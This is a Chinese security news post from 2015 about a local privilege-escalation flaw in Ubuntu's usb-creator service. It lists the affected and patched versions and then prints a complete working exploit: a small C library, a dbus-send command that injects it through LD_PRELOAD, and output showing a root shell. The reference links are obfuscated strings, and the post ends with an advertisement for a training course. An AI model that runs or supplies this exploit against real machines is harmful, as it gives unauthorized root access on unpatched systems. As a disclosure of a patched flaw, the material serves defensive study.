新闻链接：935K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3k6J5k6h3g2T1N6h3k6Q4x3X3g2U0L8$3#2Q4x3V1k6$3N6h3I4K6i4K6u0r3y4U0f1$3y4o6q4Q4x3X3g2Z5N6r3#2D9
   新闻时间：2015-04-24
   新闻正文： 今天Ubuntu12.04-14.10曝出本地权限提升漏洞，该漏洞由Google的大神Tavis Ormandy发出，包含漏洞利用测试程序。

漏洞等级：

高危

影响范围

Ubuntu Precise (12.04LTS) <= usb-creator: 0.2.38.3ubuntu (Patched in: 0.2.38.3ubuntu0.1)
Ubuntu Trusty (14.04LTS) <= usb-creator 0.2.56.3ubuntu (Patched in: 0.2.56.3ubuntu0.1)
Ubuntu Utopic (14.10) <= usb-creator 0.2.62ubuntu0.2 (Patched in: 0.2.62ubuntu0.3)

漏洞测试EXP

$ cat > test.c
void __attribute__((constructor)) init (void)
{
chown("/tmp/test", 0, 0);
chmod("/tmp/test", 04755);
}
^D
$ gcc -shared -fPIC -o /tmp/test.so test.c
$ cp /bin/sh /tmp/test
$ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator /com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"
method return sender=:1.4364 -> dest=:1.7427 reply_serial=2
$ ls -l /tmp/test
-rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test
$ /tmp/test
# id
euid=0(root) groups=0(root)
更多资料： 251K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3!0H3k6h3&6%4j5h3I4D9i4K6u0W2j5$3!0E0i4K6u0r3L8r3W2K6N6s2y4Q4x3V1k6G2M7%4y4Q4x3X3c8K6k6h3y4#2M7X3W2@1P5g2)9J5c8U0t1H3x3e0g2Q4x3V1j5H3y4q4)9J5c8U0t1J5i4K6u0r3x3e0t1`.
漏洞报告: 3dfK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6T1N6h3N6K6i4K6u0W2L8r3q4#2L8X3y4Z5M7r3q4V1i4K6u0W2L8X3g2@1i4K6u0r3N6h3u0#2L8Y4c8#2i4K6u0r3N6X3W2$3K9h3c8Q4x3V1k6Q4x3V1u0K6L8%4g2J5j5$3g2Q4x3V1k6#2M7$3u0Q4x3X3c8U0M7X3g2S2N6r3!0J5i4K6u0r3i4K6u0n7j5Y4g2Y4i4K6u0r3x3e0b7@1y4K6x3&6y4R3`.`.

[培训]科锐逆向工程师培训第53期2025年7月8日开班！